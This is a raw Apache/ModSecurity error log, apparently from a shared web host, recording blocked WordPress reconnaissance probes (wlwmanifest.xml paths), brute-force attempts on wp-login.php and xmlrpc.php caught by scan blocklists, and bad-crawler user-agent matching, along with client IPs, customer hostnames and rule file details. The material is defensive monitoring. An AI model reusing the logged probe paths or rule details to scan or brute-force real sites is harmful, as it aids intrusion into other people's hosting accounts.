[Tue May 26 16:57:42.373012 2026] [core:error] [pid 839808:tid 840054] [client 104.168.28.15:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:57:42.373036 2026] [core:error] [pid 839808:tid 840054] [client 104.168.28.15:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:57:43.305454 2026] [security2:error] [pid 839808:tid 839956] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDrpqtwAfohijxAqhh3QAAARo"]
[Tue May 26 16:57:43.663339 2026] [security2:error] [pid 839808:tid 840031] [client 45.154.98.38:51744] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWDr5qtwAfohijxAqhiAQAAAWU"]
[Tue May 26 16:57:44.477789 2026] [security2:error] [pid 839808:tid 840002] [client 45.154.98.38:55146] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWDsJqtwAfohijxAqhiHwAAAUg"]
[Tue May 26 16:57:44.927161 2026] [security2:error] [pid 839808:tid 839975] [client 20.151.111.128:7436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWDsJqtwAfohijxAqhiLQAAAS0"]
[Tue May 26 16:57:45.202337 2026] [security2:error] [pid 839808:tid 840053] [client 45.154.98.38:60772] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWDsZqtwAfohijxAqhiNAAAAXs"]
[Tue May 26 16:57:45.388943 2026] [security2:error] [pid 839808:tid 839978] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDsJqtwAfohijxAqhiCgAAATA"]
[Tue May 26 16:57:45.742022 2026] [security2:error] [pid 839808:tid 839966] [client 20.151.111.128:7335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWDsZqtwAfohijxAqhiOgAAASQ"]
[Tue May 26 16:57:46.005391 2026] [security2:error] [pid 839808:tid 840048] [client 35.254.239.233:50294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.239.254.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/xmlrpc.php"] [unique_id "ahWDsZqtwAfohijxAqhiPAAAAXY"]
[Tue May 26 16:57:46.005612 2026] [security2:error] [pid 839808:tid 840048] [client 35.254.239.233:50294] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "atreegroup.com"] [uri "/xmlrpc.php"] [unique_id "ahWDsZqtwAfohijxAqhiPAAAAXY"]
[Tue May 26 16:57:46.009763 2026] [security2:error] [pid 839808:tid 840015] [client 45.154.98.38:65156] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWDspqtwAfohijxAqhiRwAAAVU"]
[Tue May 26 16:57:46.822687 2026] [security2:error] [pid 839808:tid 840006] [client 45.154.98.38:53021] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWDspqtwAfohijxAqhiWgAAAUw"]
[Tue May 26 16:57:47.193772 2026] [security2:error] [pid 839808:tid 839997] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDsZqtwAfohijxAqhiRQAAAUM"]
[Tue May 26 16:57:47.508187 2026] [security2:error] [pid 839808:tid 839964] [client 45.154.98.38:53910] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWDs5qtwAfohijxAqhibwAAASI"]
[Tue May 26 16:57:47.625246 2026] [security2:error] [pid 839808:tid 839859] [remote 193.42.61.12:45284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWDs5qtwAfohijxAqhibQABHTA"]
[Tue May 26 16:57:48.021185 2026] [security2:error] [pid 839808:tid 840011] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDs5qtwAfohijxAqhiXwAAAVE"]
[Tue May 26 16:57:49.198911 2026] [security2:error] [pid 839808:tid 840054] [client 45.154.98.38:57525] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWDtZqtwAfohijxAqhinQAAAXw"]
[Tue May 26 16:57:49.819561 2026] [security2:error] [pid 839808:tid 840062] [client 45.154.98.38:54910] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWDtZqtwAfohijxAqhipwAAAYQ"]
[Tue May 26 16:57:50.280024 2026] [security2:error] [pid 839808:tid 839989] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDtZqtwAfohijxAqhimwAAATs"]
[Tue May 26 16:57:50.665323 2026] [security2:error] [pid 839808:tid 840001] [client 45.154.98.38:53848] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWDtpqtwAfohijxAqhiwQAAAUc"]
[Tue May 26 16:57:51.340675 2026] [security2:error] [pid 839808:tid 840052] [client 45.154.98.38:53159] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWDt5qtwAfohijxAqhi0AAAAXo"]
[Tue May 26 16:57:51.368365 2026] [security2:error] [pid 839808:tid 839991] [client 117.198.37.168:51229] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDt5qtwAfohijxAqhi0QAAAT0"]
[Tue May 26 16:57:51.368457 2026] [security2:error] [pid 839808:tid 839991] [client 117.198.37.168:51229] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDt5qtwAfohijxAqhi0QAAAT0"]
[Tue May 26 16:57:51.688402 2026] [security2:error] [pid 839808:tid 840045] [client 116.49.108.74:1321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.108.49.116.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "osmsi.org.in"] [uri "/xmlrpc.php"] [unique_id "ahWDt5qtwAfohijxAqhizAAAAXM"]
[Tue May 26 16:57:51.688578 2026] [security2:error] [pid 839808:tid 840045] [client 116.49.108.74:1321] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "osmsi.org.in"] [uri "/xmlrpc.php"] [unique_id "ahWDt5qtwAfohijxAqhizAAAAXM"]
[Tue May 26 16:57:51.790887 2026] [security2:error] [pid 839808:tid 840028] [client 14.191.15.156:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDtpqtwAfohijxAqhiuQAAAWI"]
[Tue May 26 16:57:52.040203 2026] [security2:error] [pid 839808:tid 839990] [client 45.154.98.38:51539] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWDuJqtwAfohijxAqhi4AAAATw"]
[Tue May 26 16:57:52.781798 2026] [security2:error] [pid 839808:tid 839970] [client 45.154.98.38:65384] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWDuJqtwAfohijxAqhi_gAAASg"]
[Tue May 26 16:57:52.993254 2026] [security2:error] [pid 839808:tid 839956] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDt5qtwAfohijxAqhi2gAAARo"]
[Tue May 26 16:57:53.592350 2026] [security2:error] [pid 839808:tid 839942] [client 45.154.98.38:53173] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWDuZqtwAfohijxAqhjFgAAAQw"]
[Tue May 26 16:57:54.336717 2026] [security2:error] [pid 839808:tid 840055] [client 45.154.98.38:53732] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWDupqtwAfohijxAqhjPAAAAX0"]
[Tue May 26 16:57:54.716741 2026] [security2:error] [pid 839808:tid 839985] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDuZqtwAfohijxAqhjDwAAATc"]
[Tue May 26 16:57:56.577731 2026] [security2:error] [pid 839808:tid 840006] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDupqtwAfohijxAqhjSgAAAUw"]
[Tue May 26 16:57:56.685808 2026] [security2:error] [pid 839808:tid 839991] [client 85.208.96.201:26870] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/11/"] [unique_id "ahWDvJqtwAfohijxAqhjawAAAT0"]
[Tue May 26 16:57:56.685935 2026] [security2:error] [pid 839808:tid 839991] [client 85.208.96.201:26870] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/11/"] [unique_id "ahWDvJqtwAfohijxAqhjawAAAT0"]
[Tue May 26 16:57:58.204552 2026] [security2:error] [pid 839808:tid 839909] [remote 109.70.100.14:46332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 14.100.70.109.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "strapptech.com"] [uri "/form.php"] [unique_id "ahWDvpqtwAfohijxAqhjhwABQGI"], referer: https://strapptech.com/
[Tue May 26 16:57:58.649094 2026] [security2:error] [pid 839808:tid 840028] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDvZqtwAfohijxAqhjdQAAAWI"]
[Tue May 26 16:57:58.899758 2026] [security2:error] [pid 839808:tid 839979] [client 31.57.184.107:60221] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kiaoratech.co.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWDvpqtwAfohijxAqhjkgAAATE"], referer: https://www.bing.com/
[Tue May 26 16:57:59.340223 2026] [security2:error] [pid 839808:tid 840009] [client 45.11.20.98:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWDv5qtwAfohijxAqhjnQAAAU8"], referer: https://www.anujtradingco.com/
[Tue May 26 16:58:00.248533 2026] [security2:error] [pid 839808:tid 840065] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDv5qtwAfohijxAqhjoAAAAYc"]
[Tue May 26 16:58:00.770288 2026] [security2:error] [pid 839808:tid 840049] [client 45.11.20.98:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWDwJqtwAfohijxAqhjygAAAXc"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1218846&moderation-hash=fc4784e8af093403ee41686b1bd3a923
[Tue May 26 16:58:01.810270 2026] [security2:error] [pid 839808:tid 839989] [client 117.198.37.168:51540] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDwZqtwAfohijxAqhj7gAAATs"]
[Tue May 26 16:58:01.810392 2026] [security2:error] [pid 839808:tid 839989] [client 117.198.37.168:51540] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDwZqtwAfohijxAqhj7gAAATs"]
[Tue May 26 16:58:02.195185 2026] [security2:error] [pid 839808:tid 839965] [client 114.119.153.50:30671] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "poonawallatennisacademy.com"] [uri "/category/uncategorized/"] [unique_id "ahWDwpqtwAfohijxAqhj-QAAASM"], referer: https://poonawallatennisacademy.com/hello-world/
[Tue May 26 16:58:03.027501 2026] [security2:error] [pid 839808:tid 839983] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDwZqtwAfohijxAqhj3QAAATU"]
[Tue May 26 16:58:03.383684 2026] [security2:error] [pid 839808:tid 839936] [remote 160.250.186.220:45142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWDw5qtwAfohijxAqhkEgABFX0"]
[Tue May 26 16:58:03.953227 2026] [security2:error] [pid 839808:tid 839973] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDwpqtwAfohijxAqhkAgAAASs"]
[Tue May 26 16:58:04.326464 2026] [security2:error] [pid 839808:tid 840041] [client 114.119.133.194:20027] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWDxJqtwAfohijxAqhkGgAAAW8"], referer: http://haddingtonwines.com/cart?remove_item=1f187c8bc462403c4646ab271007edf4
[Tue May 26 16:58:04.442335 2026] [security2:error] [pid 839808:tid 840063] [client 45.11.20.98:46737] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWDw5qtwAfohijxAqhkFgAAAYU"], referer: https://anujtradingco.com
[Tue May 26 16:58:04.756467 2026] [core:crit] [pid 839808:tid 840058] (13)Permission denied: [client 40.77.167.50:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:58:06.516848 2026] [security2:error] [pid 839808:tid 840017] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDxZqtwAfohijxAqhkMgAAAVc"]
[Tue May 26 16:58:08.292899 2026] [security2:error] [pid 839808:tid 839999] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDx5qtwAfohijxAqhkVAAAAUU"]
[Tue May 26 16:58:09.355161 2026] [core:crit] [pid 839808:tid 839960] (13)Permission denied: [client 157.55.39.49:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:58:09.667089 2026] [core:crit] [pid 839808:tid 839982] (13)Permission denied: [client 40.77.167.16:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:58:10.412721 2026] [security2:error] [pid 839808:tid 840062] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDyZqtwAfohijxAqhkeQAAAYQ"]
[Tue May 26 16:58:12.050736 2026] [security2:error] [pid 839808:tid 839974] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDypqtwAfohijxAqhksQAAASw"]
[Tue May 26 16:58:12.512020 2026] [security2:error] [pid 839808:tid 839947] [client 117.198.37.168:51838] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDzJqtwAfohijxAqhkzgAAARE"]
[Tue May 26 16:58:12.512187 2026] [security2:error] [pid 839808:tid 839947] [client 117.198.37.168:51838] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDzJqtwAfohijxAqhkzgAAARE"]
[Tue May 26 16:58:14.469008 2026] [security2:error] [pid 839808:tid 840007] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDzJqtwAfohijxAqhk2gAAAU0"]
[Tue May 26 16:58:15.832051 2026] [security2:error] [pid 839808:tid 839953] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDzpqtwAfohijxAqhk9gAAARc"]
[Tue May 26 16:58:16.744236 2026] [security2:error] [pid 839808:tid 839826] [remote 13.203.52.35:53726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.52.203.13.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahWD0JqtwAfohijxAqhlKgABXA8"]
[Tue May 26 16:58:17.560439 2026] [security2:error] [pid 839808:tid 839952] [client 14.187.192.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDz5qtwAfohijxAqhlCwAAARY"]
[Tue May 26 16:58:18.363925 2026] [security2:error] [pid 839808:tid 840057] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD0JqtwAfohijxAqhlLQAAAX8"]
[Tue May 26 16:58:19.966668 2026] [security2:error] [pid 839808:tid 840066] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD0pqtwAfohijxAqhlXwAAAYg"]
